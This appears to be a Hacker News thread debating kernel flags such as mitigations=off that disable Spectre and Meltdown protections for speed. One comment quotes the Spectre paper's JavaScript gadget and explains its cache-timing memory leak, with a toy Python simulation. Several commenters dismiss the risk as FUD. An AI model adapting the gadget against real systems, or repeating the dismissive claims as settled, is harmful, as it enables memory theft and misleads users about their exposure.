Yes, and since it's just a URL even if you perform an audit it could have malicious code injected at any time in the future without your knowledge.


Which is perfectly fine for personal use or in a data center where you control the whole server.


Personal use usually involves a web browser, which usually executes untrusted javascript from the web. You won't find me disabling these mitigations on any of my workstations any time soon.


Is there a poc of an attack that works on an up-to-date browser iff these mitigations are disabled?


Yes, the original Javascript exploit from the paper still works, because the browser cannot mitigate this attack without just disabling parts of Javascript entirely which breaks Javascript.

With all current kernels built to mitigate these exploits, and all sane people running those kernels, there's no benefit in patching the browsers too, even if it were somehow possible, which for all intents and purposes it is not.

https://react-etc.net/page/meltdown-spectre-javascript-explo...


Note, browsers did disable some js features to mitigate -

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Refe...

Well, the link you provided doesn't use SharedArrayBuffer; it is used as part of the exploit in the original paper (as a method to make a high-resolution timer).


You've linked an "example" but what I'm looking for is a complete poc that I can execute to see for myself that it works.


You won't find a real world exploit that does something like reading a password, SSH key, etc. It would be like winning the lottery, then getting your money out 1 penny at a time for the next several decades. You can find "academic" PoC exploits that work under pristine conditions.


I don't see how that code exploits anything?


Can you or someone explain that exploit? Where is it reading out of bounds data?


I'm not super familiar with Spectre, but I think the linked page is misinterpreting the vuln (hopefully someone will correct me if I'm totally out to lunch).

So the original js from the spectre paper was:

  if (index < simpleByteArray.length) {
    index = simpleByteArray[index | 0];
    index = (((index * 4096)|0) & (32*1024*1024-1))|0;
    localJunk ^= probeTable[index|0]|0;
  }

The code looks a bit weird (all the |0) to ensure Chrome JITs it the correct way. My understanding of what happens: the loop runs a bunch of times while index is inside the simple byte array. After the last iteration, the processor speculatively executes the body one more time than it should (branch misprediction). It eventually figures out the loop should have ended and undoes the speculative execution - however, that only happens after the body has already started executing (where it's not supposed to).

During this improper execution, index is past the end of simpleByteArray. index = simpleByteArray[index | 0] is then executed, so index is now set to the value of some memory in the current process that the current JS is not supposed to access. index = (((index * 4096)|0) & (32*1024*1024-1))|0; is executed to spread the memory value out (we need all possible values to land in separate cache lines of probeTable later). We now execute localJunk ^= probeTable[index|0]|0; (localJunk is just there to prevent dead code elimination). Since we are indexing into probeTable at 4096-byte intervals, we have to fetch that value from memory, and it then gets cached by the processor. This all gets undone by the processor when it realizes that the branch was incorrect - except the cache changes are not undone. If we access anything else in the same 4096 bytes later on, the access is a tiny bit quicker.

The exploit is, that after all that setup, we try accessing each 4096 byte region of probeTable, to see which one is fastest. We can than conclude that was the value of index during the branch misprediction and thus the value of that byte of memory we aren't supposed to see.

If we do this a lot, we can read the rest of the process's memory. The hope is we will be able to find cookies related to other websites currently open, and then do evil things with them.

This attack no longer works because browsers disabled SharedArrayBuffer, which provided the really precise timer. The timing difference is very small, so you need a very fine-grained timer to make it work. It should also be noted that this variant of Spectre is in-process only - some versions of Meltdown/Spectre allow accessing the memory of other processes, but as far as I understand this one does not.

I hope that made sense, and I hope I didn't screw that up.
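
To make the readout step above concrete, here's a toy simulation in Python (names are mine). The speculation and the timing side channel are faked - the "cache" is just a set - because those parts only the hardware can do; the point is only to show how one leaked byte maps to exactly one 4096-byte stride of the probe array:

```python
# Toy model of the probe-array readout. Real attacks decide "was this
# access fast?" by measuring latency; here "fast" = "in the set".
PAGE = 4096

def speculative_touch(secret_byte, cache):
    # During the mispredicted branch, the leaked byte selects which
    # probe-array cache line gets pulled in. Architectural state is
    # rolled back, but the cache footprint (this set) survives.
    cache.add(secret_byte * PAGE)

def recover(cache):
    # Probe every 4096-byte stride; the single "fast" one reveals
    # the value of the byte we were never supposed to read.
    for value in range(256):
        if value * PAGE in cache:
            return value
    return None

cache = set()
speculative_touch(0x41, cache)
print(hex(recover(cache)))  # → 0x41
```

Repeating this once per byte is how the attack walks through the rest of the process's memory.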


Thank you!

> to see which one is fastest.

The timing is extremely important and not at all visible in the code (which makes sense, since it's a side-channel attack.)


Eh. The amount of performance you sacrifice in order to mitigate the very small chance of actually running across any javascript in the wild that a) successfully exploits you, and b) actually retrieves anything worthwhile, just isn't worth it. It's such a tiny risk that it's really only worth mitigating against if you're paranoid or handling particularly sensitive information.


Again, JS can no longer perform this exploit. Browser vendors have disabled (made inoperable) high resolution timing. It's now at 1ms resolution. Not enough timing resolution to mount the attack.


Wasn't there a POC of spectre that used a counter in a webworker as a timer?


postMessage cannot provide a reliable timing signal since it goes on the task queue on the receiving end (in the main thread) along with other pending events, and even if there were no other events, there is latency noise in postMessage due to the fact that the web worker is not the only thread running on the CPU. Some suggest that the attack would only take more time as the attacker has to collect a bigger sample, and factor out the noise, but I haven't seen a public exploit based on that.

The other angle of attack that used to be viable was documented in this HN comment: https://news.ycombinator.com/item?id=14057091

But AFAIK all browsers have disabled SAB, e.g. see: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Refe...

EDIT:

Chrome has re-enabled SAB, with mitigations.


Ah, bloat as a security feature. I keep learning new things here!


The minimum essential behavior to implement a feature is one that takes keeping the user safe from attacks into consideration... You could call that bloat, but I wouldn't be sarcastic about it: if you can make the mitigations more concise, you can contribute your ideas; no one is stopping you.


Show us a shred of evidence attacks via javascript are viable using these vulnerabilities.

I run ScriptBlock anyway, so it's even less of a concern for me.



I opened the first link. The description starts with:

    Enable `#shared-array-buffer` in `chrome://flags` under your own risk...


Shared Array Buffers are enabled by default in Chrome now, because Chrome has separate mitigations against Spectre.

To the best of my knowledge, it does not have mitigations against Meltdown because it assumes those protections will be implemented at the OS/firmware level, but if anyone has more experience or insight than me on that front, they're welcome to correct me.

In any case, you're making a kind of wild assumption that the type of user who disables a security feature in their OS to get a speed increase won't also disable security features like Site Isolation in their browser when they hear that those features increase Chrome's memory usage by somewhere between 10-20%.


Cool. I wasn't aware Chrome re-enabled SABs, with mitigations.

https://github.com/tc39/ecma262/issues/1435


So there's a known exploit in CPUs and your response is "prove to me it can be exploited or I won't use mitigations"? In 2020 no less? What can you possibly be doing that would even notice the slowdown from these mitigations? Virtually everything we actually do will be bottlenecked by something else long before the CPU becomes an issue.


In my mind javascript is so many layers removed from machine code that it would be insanely hard to even break out of the chrome sandbox let alone glean anything useful from other running processes.

Practically speaking, what is possible?


You might want to google: 'javascript spectre exploit'.


That depends on high-resolution timers, which have been disabled in all browsers. AFAIK.


There are variants of Spectre that do not require a high resolution timer. Here's some thoughts on working around browser mitigations: https://alephsecurity.com/2018/06/26/spectre-browser-query-c...


"We were not able to use these techniques in Firefox, as they recently reduced the timer resolution to 2ms. The technique presented here is potentially relevant even for this timer resolution, but some parameter tweaking is required."

AFAIK, Chrome's highest resolution is also in the ms range.

I have some thoughts, too, but thoughts don't amount to a working exploit. Show me a currently working exploit, that is in the open. As far as state actors developing such exploits, there are a ton of holes in that scenario at every layer in the stack.


Their PoC focused on Chrome. I would assume that "parameter tweaking" probably means "change some things to make it work but run slower".


HN wouldn't let me nest another response. This is in regards to "Timers aren't necessarily even a requirement"

<<you can busyloop and count iterations of that instead as a “timer”>>

Assuming you're the only job running on the CPU, which is not the case. Threads are not running continuously. But again, if there is a working exploit in the browser then show us. Talk is cheap.


I am aware that threads don't run continuously; scheduling just makes this worse just like timer jittering does. Sadly, I'm not the kind of person who can drop full, working exploits against unpatched browsers in response to Hacker News comments; I just have a passing interest in the field :(


performance.now resolution in Chrome is between 1 and 2 ms, I believe, with jitter. If they have a working POC for Chrome why not demonstrate the full exploit and force the Chromium team to rethink their mitigations? Lots of people talking possibilities but zero working exploits in the open. That's not a good ground for rational debate.


Timers aren't necessarily even a requirement to exploit Spectre: https://news.ycombinator.com/item?id=22831067. It's pretty hard to protect against this in general unless you generate retpolines.


I could show you an ubuntu root password dialog and you would type your password into it > 0% of the time.


These aren't GRUB parameters, they are kernel parameters.


Will these parameters work on a VM as well, or just a bare-metal host?

Edit: looks like "performance gained by disabling workarounds for the mostly Intel CPU security flaws are not all that impressive in all workloads": https://linuxreviews.org/HOWTO_make_Linux_run_blazing_fast_(...


I think I/O heavy benchmarks would be much more useful as syscalls take the heaviest hit from the mitigations.


I mean, it's pretty obvious that enabling an option named nospectre_v1 (and v2) is going to disable the Spectre mitigations. I feel like nobody should act shocked by this.



Well you know it says `nospectre_v2 nospectre_v1`, they're not being exactly sneaky about it.


Except a random person might not know what these names refer to.


Is it relevant to AMD Ryzen users?


The thing I would really like to figure out is how to prevent a Linux system from essentially livelocking when it comes close to running out of memory. We've all seen it: try to ssh in, and connections get established but do not proceed. If you're lucky enough to have a console shell open from before, it shows a gigantic load. I wish there were a way to put a few system-critical processes into a container to guarantee them some resources.


Try a userspace OOM killer. EarlyOOM has been a lifesaver for me, but there are a few others. AFAIK Fedora and Clear Linux have begun shipping EarlyOOM by default.

nohang's README has an overview of other projects.

https://github.com/hakavlad/nohang



Thanks for that. Sure enough this was even on HN before :)

https://news.ycombinator.com/item?id=20620545


I've heard this problem is caused by Linux's overcommitting strategy. Basically, initial memory allocation never fails (unless you set special flags), but no memory is actually allocated on the spot. Memory is only allocated when it is accessed. And if Linux runs out of memory when a program accesses a piece of yet-to-be-allocated memory, it will try really _really_ hard to free up memory so that the access can succeed.

That's what's causing the lock ups.

Sounds to me like this would be difficult to fix without breaking backward compatibility.

In the mean time, you can probably improve your quality of life quite a bit by using something like: https://github.com/facebookincubator/oomd


It's more complex than that. Doing lazy allocation is not the problem; it's a common optimization. The problem comes when Linux allows programs to (lazily) allocate a total amount of memory that is larger than the available RAM+swap before failing allocations. Then, when processes actually try to use that memory, there is no physical place to put it, and the only solution is to kill a process (OOM).

This may certainly seem stupid at first sight. I don't remember the exact reason why Linux does this, but I remember it being said that not doing it would mean not using all available RAM efficiently, and allocations would start failing earlier than expected, or something like that.

It's actually pretty easy to change this behaviour: there is a sysctl (/proc/sys/vm/overcommit_memory) that defaults to 0, but you can disable the overcommitting behaviour and even tune it. Setting it to "2" disables the entire overcommitting logic, and it's what some people use to avoid memory-thrashing situations (though you can still get OOM in some situations IIRC): https://www.kernel.org/doc/html/latest/vm/overcommit-accounting...
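
Concretely, strict accounting can be enabled at runtime or persistently (the file name below is illustrative; the knob names are from the kernel's overcommit-accounting doc):

```
# Runtime:
#   sysctl vm.overcommit_memory=2

# Persistent, e.g. in /etc/sysctl.d/90-overcommit.conf:
vm.overcommit_memory = 2
vm.overcommit_ratio = 100    # commit limit = swap + 100% of RAM
```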


Overcommit is needed when a large process fork-execs a smaller process. If overcommit is disabled then forking a large process will fail even if it would be safe in practice. A proper implementation of spawn() could fix this but that's not the Unix way.


Turning off overcommitting can break certain applications that rely on it. For example, AddressSanitizer allocates huge address-space regions as shadow memory.

I do not think overcommitting is the problem. I believe the problem is that Linux won't allow memory accesses to fail: it gets stuck in a loop trying to free up memory, and eventually triggers the OOM killer.

It could have just let the memory access fail.


.. or swap?


or both!?


> Wish there was a way to put a few system critical processes into a container to guarantee them some resources.

There is, memcg is a thing, and it has both minimum free and maximum bounds. See the systemd.resource-control(5) man page, you can put important services in their own slice or use nspawn containers.

Personally I use nspawn containers for my web browsers, and set memory limits on them. This limits the live-lock behavior you're describing to just within the container. When firefox uses up all the memory, I see thrashing in the form of mostly executable pages being constantly evicted and faulted back in from disk, but the rest of the system stays responsive while the disk is hammered by the reads and some CPU burned while firefox spins its wheels.
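
For the "guarantee sshd some resources" case specifically, a drop-in along these lines is the sort of thing systemd.resource-control(5) enables (a sketch; MemoryMin requires cgroup v2, and the values here are arbitrary):

```
# /etc/systemd/system/ssh.service.d/resources.conf
[Service]
MemoryMin=64M    # keep at least this much of sshd's memory resident
CPUWeight=500    # favor sshd under CPU contention (default is 100)
IOWeight=500     # likewise for disk I/O

# Apply with:
#   systemctl daemon-reload && systemctl restart ssh
```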


This happens when the system is swapping and most processes are swapped out. Then in theory each context switch would need to swap in some pages first.

Not having given this much thought, I think some solutions could be: (a) Favor processes that are already swapped in and keep them swapped in a bit longer before swapping in other processes, i.e. trade fairness for higher throughput. (b) Kill the worst offenders; EarlyOOM, etc., comes to mind. (c) Simply do not swap :)

I realize it's not a solution... But on my systems I simply have swapping disabled.


Killing the elephant in the room - the userspace low-memory handler's ability to gracefully handle low memory pressure https://www.reddit.com/r/linux/comments/ee6szk/killing_the_e... - The discussion was three months ago


Besides the userspace OOM killers mentioned in sibling comments, make sure to run the most recent kernels. This issue has gotten some attention lately, and improvements for specific workloads have trickled in over several releases and will probably continue to do so. Additionally, some of the userspace solutions rely on the fairly new /proc/pressure interface.
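
For reference, the /proc/pressure files are plain text and trivial to parse; this is what tools like oomd build on. A small sketch (Python; parse_psi_line is my own name, and the line format is taken from the kernel's PSI documentation):

```python
def parse_psi_line(line):
    """Parse one line of /proc/pressure/memory (or cpu/io).

    Example line, per the kernel PSI docs:
      some avg10=1.23 avg60=0.50 avg300=0.10 total=12345
    Returns the kind ("some" or "full") and a dict of the fields.
    """
    kind, *pairs = line.split()
    fields = {k: float(v) for k, v in (p.split("=") for p in pairs)}
    return kind, fields

kind, f = parse_psi_line("some avg10=1.23 avg60=0.50 avg300=0.10 total=12345")
print(kind, f["avg10"])  # → some 1.23
```

A userspace OOM handler can poll these averages and start killing (or throttling) when avg10 crosses a threshold, long before the kernel's own OOM killer wakes up.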


I did my own testing a while back, because I wanted to measure if these actually make a performance impact for my use case.

Net result: they do not. For my use case (Clojure/JVM and ClojureScript compilation), compile times did not get shorter. There seemed to be a slight improvement, but it was below the level of measuring noise (which was around 8%).

My conclusion was that while the system might indeed be faster by several percent, it is not measurable in my case, so I should not even bother, given the possible risks.


> Net result: they do not. For my use case (Clojure/JVM and ClojureScript compilation), compile times did not get shorter. There seemed to be a slight improvement, but it was below the level of measuring noise (which was around 8%).

I think the level of measuring noise is 0.5%; at least, that is what low-level systems programmers generally consider noise...


I don't think anyone else gets to say how much noise the GP saw in their test.


How can you know that information?


Compile times for my project are around 2m15s to 2m30s. Since this work involves lots of CPU (some single-threaded, some multi-threaded work) and I/O, the spread mentioned above is what I get with multiple measurements.

While it's true that without the mitigations times were much closer to the 2:15 mark, there were still outliers at 2:24. Which means it's hard to draw any meaningful conclusions.

Not sure where you got the "0.5%" figure from.


Nice work. Anyone claiming performance improvements without an accompanying benchmark that is relevant to your usecase is wasting your time.


My experience was different. My laptop boots in half the time with these mitigations disabled, and is noticeably much faster to use.


That's weird. I don't think anyone has measured these mitigations at a 50% perf hit even on crafted workloads. I wonder if something else is going on.


15% of pure CPU, but that doesn't take into account the knock-on effects of the CPU improvement on other subsystems (e.g. a faster crypto fs leading to higher IOP rates, etc.).


Running insecure performance enhancing kernel mods to speed up crypto fs....

It's a self defeating performance tip!


TBH there's different threat models there. A crypto fs makes sense if you're worried about a box getting stolen, while spectre/etc aren't a concern if you're running regular userland stuff on a single-user box.


same conclusion on the hardware i tested with


Only mitigations=off is needed now. More information at

https://www.kernel.org/doc/html/latest/admin-guide/kernel-pa...

Search for "mitigations=" there.


To clarify parent comment: if you understand the security risks and wish to turn off these mitigations, on modern kernels the entirety of the linked website's kernel args can be shortened to:

    mitigations=off
All of the rest is now redundant.

TIL: the default `mitigations` value, `auto`, leaves SMT enabled—even if it's vulnerable(!!!)—to avoid surprising sysadmins who upgrade to find SMT disabled. The full protection, non-default option is:

    mitigations=auto,nosmt
Thanks for the doc link!
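
Either way, you can verify what a running kernel actually ended up doing via sysfs (kernels 4.15+); the output below is only illustrative and varies by CPU, kernel, and flags:

```
$ grep . /sys/devices/system/cpu/vulnerabilities/*
/sys/devices/system/cpu/vulnerabilities/meltdown:Mitigation: PTI
/sys/devices/system/cpu/vulnerabilities/spectre_v2:Mitigation: Full generic retpoline
```

With mitigations=off these entries instead report "Vulnerable".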


>> the default `mitigations` value, `auto`, leaves SMT enabled—even if it's vulnerable(!!!)

Is SMT always vulnerable? Is there a way to only disable SMT if it's vulnerable on the target system?


To my knowledge it's always vulnerable on Intel processors, but not on AMD ones due to architectural differences. The nosmt option, when added to the mitigations option, should only disable SMT on vulnerable processors according to the Linux admin guide.


I kept them because there were kernels with the no...=off flags but not mitigations=off yet.


That's insane. If you actually care about Linux performance so much, instead of poking security holes in your system, you might consider switching to Intel's Clear Linux (on AMD too) or (better yet) a performance-tuned kernel like XanMod:

https://www.phoronix.com/vr.php?view=28805


How is it insane? Dropping a few lines into the GRUB config is much easier than installing a whole new kernel.


And dropping in those lines of config opens vulnerabilities on your system. In 2020, that's insane.


Doing a little research I came across this article (1) which explains what the flags are for:

(1) https://linuxreviews.org/HOWTO_make_Linux_run_blazing_fast_(...


Promoting disabling the Spectre mitigations should at least come with an explanation and a warning...


You're supposed to investigate those before you use them.


More broadly, I am just wondering whether this submitted link to 'Make Linux Fast Again' is relevant at all. Let me explain:

- For tech-savvy people, the boot options disabling the Spectre mitigations are very poor information, as it takes 2 secs to find them with Google. 'Rich' information would also cover the expected gains in terms of performance and the risks in terms of security, which might be the only things that matter to people wondering whether they should do it, given that making the change itself is an easy and fast operation.

- For non-tech-savvy people, the boot options mean nothing at all, so they will not be able to benefit from the information, as nothing is explained.

So if this submitted link is useless for both tech-savvy and non-tech-savvy people, who is it intended for? And if it is intended for and useful to no one, is it relevant?


That’s why there’s no warning labels or disclaimers anywhere else in life right?


Windows version is here: (scroll down to where it says "Manage mitigations for CVE-2017-5715")

https://support.microsoft.com/en-us/help/4072698/windows-ser...


Will these modifications result in better performance on a non-server user install of Windows 10 Professional?


Here, run as admin and click disable, restart. https://www.grc.com/inspectre.htm


The irony here is that these mitigations were meant to protect against threats that most desktop users will never be subject to. Yet people who want back the performance of the computers they paid for are going to attempt it by running programs they know nothing about - which is a more likely way of getting their systems infected than anything these mitigations protect against.

After all it is much easier to tell someone "here, click this as an admin to make your computer fast" and directly extract any data you want, than try and take advantage of all the issues the mitigations fix and the gamble that all the assumptions you are making will be correct.


A lot of people wouldn't read the source code anyway.


Yeah, we wouldn't want people to do things they don't understand.

Maybe when people ask for clarity on a subject, we should give them reasons instead of saying things like "just don't".


It would be nice if GRC could release the source for this tool so people could see what it queries and sets in order to function.


I thought this was going to be a replacement for all the free desktop crap for a minute. Now I’m disappointed.


The problem with this is that Linux is no longer the OS. The browser is. And "modern" "browsers" do one thing: they automatically run arbitrary code from random places in a virtual machine. The very thing all these mitigations protect against.


Yeah right, databases, app servers, network systems etc all run in a browser.


Serious question: In old Sandy Bridge days it was recommended to disable hyperthreading. That would decrease heat produced by CPU and allow better overclocking (2600k versus 2500k debate).

Are there some features in the CPU (such as hyperthreading) I can disable so that I can run the system without those workarounds? I think a faster Linux kernel could offset the slightly lower CPU performance. There would also be lower energy consumption on a laptop...


On Intel: For some mitigations, disabling hyperthreading will disable them, since the corresponding vulnerabilities are only present with it enabled. That being said, the overall performance impact of disabling hyperthreading will be greater than that of enabling the mitigations (though some vulnerabilities remain for as long as hyperthreading stays enabled).

I wouldn't expect lower energy consumption from disabling hyperthreading: completing tasks faster allows the CPU to reduce its frequency sooner.



There should be some disclosure that it will make it fast but very insecure


there is nospectre_v1 and nospectre_v2 written in there; unless you've been living under a rock, you should get a pretty good idea that this is not a very safe thing to do.


It depends on your threat model.


yeah it looks great for air-gapped machines or if you've disabled the tcp/ip stack in the menuconfig AND can guarantee that nobody else ever has physical access to your machine


Yeah, "nobody else ever", might be a bit excessive.

Like, "oh shit grandpa is doing an elevation attack on the family computer again".


which depends on you even knowing your ever-changing threat model. Known and unknown unknowns are always present.


Could you go into detail on what you mean here?


You run a Hadoop/Spark cluster on-prem. It's isolated from the rest of the world. If foreign code is executing there, the game is already up. You set `mitigations=off`.


Are you Jeff Bezos, Bill Gates, Tim Cook, some other high-profile billionaire, a head-of-state target, or someone who works for such a target? If yes, do not do what the site says.

If not, it doesn't affect you.

Such security measures take into account possibility, but usually ignore probability.


> If not, it doesn't affect you.

I don't think I agree. Instead, I'd rephrase: "Do you ever use your web browser on this computer to go to less-than-trustworthy sites? Ones that use ad networks or load a cryptominer? Then you may not want to turn these on."

The risk for most individuals isn't that they'll be held ransom, rather their property will be abused and they'll have to repair it.


What do you believe is going to happen if you visit a less-than-trustworthy site? For a drive-by exploit to work (assuming there even is one; just because a site is "shady" doesn't mean it is 100% certain to try to infect your computer with something), it needs to make a TON of assumptions about your setup, and chances are (again, the probability that security types ignore) you won't be affected.

And really, those issues should be solved at the browser level, not at the OS level, which affects every single application that runs on it. And AFAIK they already are.

I do not want my compiler or game or renderer or whatever else to become slower for certain just because someone may visit a site that may have an infected ad that may match an exploit their browser may have, and may manage to extract some information that may be useful to whoever wrote the exploit (assuming they even manage to get that information back).

Also a cryptominer will only work for as long as you have the site open, of all the things that could go wrong, this is the most benign one.


> And really those issues should be solved at the browser level not the OS level level that affects every single application that runs on it.

They aren't -- this is exploitable in the browser if not patched at the OS level.

> For a drive-by exploit to work (assuming there is one, just because a site is "shady" it doesn't mean it will be 100% sure that it will try to infect your computer with something) it will need to make a TON of assumptions about your setup

If you run these on an ad network, you get access to millions of different setups - you don't need to make any assumptions, you're virtually guaranteed to find someone with a vulnerable setup.


Yes, but the chances are very low that the someone is you if you're using a recent browser version (I'd say not cutting edge, but recent). Probably far, far lower if you use uBO or similar. On Linux, at home, they're probably infinitesimal unless you're being targeted.


Mostly FUD. It's not really exploitable in a practical real world sense. Show me the exploit that can read my password or SSH key, and not some fixed set of data that's been staged by the PoC.


The problem is that without all mitigations in place, at any time you /may/ have been exploited. So every time your system acts weird, you'll have that extra doubt. And it can be pretty difficult to remove a sophisticated exploit. I could see a sophisticated exploit network probing, tagging, and targeting different exploits, for profit or just for fun. Probably not worth the risk for "most" people.


Are there any live exploits detected for Meltdown or Spectre? When talking about these vulnerabilities, people seem to forget that these are pretty costly attacks: complex, slow (IIRC at most you can read memory at 5 kB/s), and requiring targeting of specific memory locations, software, etc. Why would an ad network or a cryptominer invest in such an attack when "Click here to download more RAM" still works?


There aren’t even PoCs that work on modern browsers. These things are real at the cloud-server level, but their exploitability at the desktop/laptop level is overstated. There are much easier vectors.


There's a lot of FUD going on. You're correct in that _many_ speculative execution attacks are in general very difficult to exploit in a useful way, i.e. things like timing side channels using shared TLBs or a hyper-threaded core.

The Meltdown attack (also a speculative execution attack) is a much bigger deal: it's easy to exploit, and an attacker can basically read arbitrary memory on your system. It is easier to mitigate, too, with KPTI. Before KPTI, your OS kept the full set of kernel page tables mapped while user processes were running, and their contents could be exfiltrated through the speculative execution side channel.

AMD processors (and I believe newer Intel processors) are basically immune to Meltdown, so it may be safe for you to turn off KPTI for a (minor) performance boost. Having said that, newer CPU TLBs have process-context IDs that let the OS make up for some of the performance impact, so you might not notice a difference at all.

The original "Spectre" attack (name in the whitepaper - not to be confused with the greater class of Spectre attacks) allowed out-of-bounds memory access within a process' address space via speculative execution. So, if your browser was running in a single process, then some Javascript could read other browser memory containing things like passwords, keys, etc. If your browser is running scripts or pages in their own sandboxed process, then the risk is pretty low.

Any Spectre mitigations performed by the kernel are not going to be a silver bullet, anyhow. These are _mitigations_, not "magic Spectre attack prevention" features. Unless out-of-order execution (or caches!) is eliminated entirely, speculative execution attacks are going to be a threat. (Interestingly, the Itanium CPU and its VLIW architecture appear to be immune to these attacks.)

Even compiling your software with Spectre mitigations turned on (available in MSVC, not sure if GCC has implemented it yet) doesn't do a whole lot of magic - it will insert a serializing instruction (LFENCE on x86-64) to clear out the pipeline during certain loop-branch combinations, ensuring that a speculative read can't occur before the outcome of the branch is decided.

Any time there are shared resources between processes, CPUs, computers, datacenters, etc. there is a side-channel - period. What can be leaked via this side-channel, how noisy the side-channel is, what the rate of data exfiltration is, these are things under our control, but eliminating side-channels entirely is a fool's errand.

So, would I risk turning off the Spectre mitigations? I'll put it this way: I'd worry about the Spectre kernel flags after I had a Linux antivirus program installed, and turned on and tightened up my AppArmor or SELinux configs.

I'm sure many of the people crying out against the crime of disabling Spectre mitigations haven't done that yet (just like I haven't) - because it's a PITA! So, if you disable the mitigations and decide the performance increase is worth the risk, I wouldn't fault you for it.

The whole reason these exploits exist in the first place is that the CPU performance increases available from speculative execution, out-of-order execution, and deep CPU pipelines were worth the risk (to the vendors' reputations, at least). I don't see a lot of people going back to buy Itaniums because they're worried about Spectre attacks.

Now - would I turn off KPTI? On an AMD CPU, sure. On Intel (unless you've double checked, the CPU was produced in the last couple of years, and it's immune to Meltdown) - ABSOLUTELY NOT!


Well, if you have an idea of what to do with the undocumented string returned by the site, maybe you also have an idea of what effects it might have, beyond making Linux fast again?



Important quotes:

> You are (probably) an adult. You can and should wisely decide just how much risk you are willing to take. Do or don't try this at home. You do not want to try this at work.

> As the above charts show: The effect of default parameters vs mitigations=off is measurable but not hugely impressive. (…)


> You can and should wisely decide just how much risk you are willing to take

That requires informed consent. But we can see that people are not well informed: many don't realize that a web browser or an attacker-accessible network stack are attack vectors.

I've been using these options for a while (well, mitigations=off is new to me)... on dedicated rendering computers that are on a port isolated network inaccessible to the internet and without the ability to make outgoing connections at all.

That's probably (I hope?) a reasonable usecase for these settings... but not exactly a super common one.


If someone suggests something I am not taking it seriously without good explanations.


If one uses these flags without understanding exactly what they mean, then one deserves whatever painful experience they may encounter.


What pain? No exploits have ever been documented. These mitigations are makeshift insurance for datacentres.


The operative word in my sentence is "may," indicating a level of uncertainty.


You can download PoCs from GitHub right now.


I've yet to see reports of one running involuntarily in the wild.


Probably because most systems quickly adopted mitigations and attackers then moved back to lower-hanging fruit.


So you are saying the anti-vaxxers of the linux world are protected by herd immunity? Interesting angle for sure!


I'm truly shocked by the comments I'm seeing here. When did so many people forget everything we've learned about security? You know what a zero-day attack is right? You know how fast those can cover the whole internet these days right? So why would you purposely leave a gaping security hole in your system to get some performance on a CPU that's probably too fast for your realistic workload already?


I've never seen reports indicating any exploit running involuntarily in the wild, ever.

That fact, however, does not validate my position.


"I've yet to see a horse run out, so why would I bolt this barn door?"


It's a special type of horse that won't run out unless aliens from another galaxy throw space hay at the door.


In March of 2019 there was no worldwide pandemic forcing hundreds of millions to shelter in place.

The point is that you vaccinate before an illness starts spreading if you can, because things spread quickly when you do not, and that can create quite a mess.


These academic PoCs read data that they themselves have staged during execution. This is very different from reading arbitrary, random memory that contains something like a cookie for another web site, password, or SSH key. When someone is looking for a real world exploit, this is what they want.


I don't think anyone has actually bothered to exploit a microarchitectural side channel in practice yet.


Does anyone know a benchmarking utility that can quantify the impact of these mitigations? I mean I don't do much CPU bound work like heavy compiling on my machine, but I would nevertheless be interested in seeing what the effect is.


I guess you can use phoronix test suite: https://www.phoronix-test-suite.com

Those mitigations are benchmarked quite frequently on phoronix.com, for example: https://www.phoronix.com/scan.php?page=article&item=3900x-99...


The phoronix.com site has run several benchmarks with these mitigations on and off.


Is this needed for AMD-based machines?


You can run the Phoronix test suite before and after enabling them. There's not a lot of data on the various recent AMD platforms, presumably because of the smaller market share especially until recently. I imagine there's a large difference between mitigations=on and mitigations=off on the pre-Zen AMD platforms and a smaller difference between the two on the most recent AMD generation.


Excellent, thanks! I have a box where literally the only thing I care about is CPU speed (build cluster) and nothing on that box is worth anything at all.


I'm saying this lightly, but in some cases malware starts with boxes where nothing in them is worth anything at all, because their CPU speed and Internet connection are tools for botnets.


Fortunately, neither Spectre nor Meltdown allow write access of any kind.


At least until it reads credentials out of memory.


Build clusters almost always run in a local network without internet connection. Or with connections to specific hosts.


What about the thing you're building?


For what it's worth, I tried this on my home server and load average remains at 0.00 0.00 0.00 when the machine is doing nothing. That is perhaps understandable, but before I enabled mitigations=off, it was always at some kind of a load, e.g. 0.07 or so.


How much of a difference will these make? Trying to decide if it's worth my time.


I did this on my i5 4300U laptop, and whilst I didn't formally benchmark it, the boot time halved and it feels a LOT faster to use. So much snappier.


Considering it takes all of 15 seconds to setup (5 minutes including reading), it's really not a matter of if it's worth your time, but if it's worth the risk, since it disables mitigations for hardware vulnerabilities.


I don't think there's an easy answer. It will very much depend on your hardware and what kind of software you run. I'd say the best way to tell is just to try it, measure performance, and compare results.
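A quick-and-dirty way to see the syscall-overhead side of this without a full benchmark suite: a `dd` loop with a 1-byte block size, which is dominated by syscall entry/exit cost, the thing KPTI and friends make more expensive. This is a rough probe, not a proper benchmark, and it assumes a Linux box with GNU coreutils:

```shell
# bs=1 forces one read()+write() syscall pair per byte copied, so the
# reported throughput mostly measures kernel-entry overhead rather than
# memory bandwidth. Absolute numbers are machine- and kernel-specific.
dd if=/dev/zero of=/dev/null bs=1 count=100k 2>&1 | tail -n 1
```

Run it once with the current settings and once after rebooting with the flags; the change in the reported rate roughly tracks the extra syscall cost the mitigations add.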


First, do you use JS?


You make it sound as if JS was the only attack surface, whereas it's just the most common one.


I did not get that impression at all from that comment, FWIW.


Make Linux Vulnerable Again.


Are there any javascript exploits, on desktop, of these?


Spectre v2, possibly?


a.k.a Make Linux Unsafe Again.


Is there any public PoC that can exploit an Intel or AMD system with mitigations=off? And if so, what kind of access is needed?


Would be good with some context on motivation and impact. Some of these are specific to x86, for example.


I suggest adding a quick paragraph of explanation; at first I thought the server had been hugged to death.

Thanks for this


What kind of performance gains would an AMD Zen2 system receive from disabling all of these mitigations?


If I disable these fixes, how likely is it (how much effort would it take?) that somebody would make use of these vulnerabilities?

AFAIK I (on my personal workstation) would only be exposed via browser JS, so if I do not spend too much time on shady sites, I should be good?


Basically: If you're fine with every program running on the system (including web browser in your case) having full, unfettered access to everything else on the system, then it's fine to disable the fixes.

In other words: Only do this on systems where you actually trust each running program not to be compromised in its day-to-day operations and turn against you. Anything that runs arbitrary code from an outside source (for example JS) is not safe.


And yet, with all of the pearl-clutching in this thread and countless others just like it, nobody seems to be able to point to any real-world exploits.

The threat is purely theoretical. The loss in performance is not.


As tsimionescu points out, it's only read access. But to go further, in most Unix systems, the default is already to give most users read access to almost everything: default masks in the filesystem tend to be 755, and when it comes to inspecting data from other users, there's an awful lot you can figure out by default. Leaving aside the fact that many home computers are single-user in practice anyways.


> having full, unfettered access to everything else on the system, then it's fine to disable the fixes.

You should say READ access. There is no risk of write access with Spectre or Meltdown.


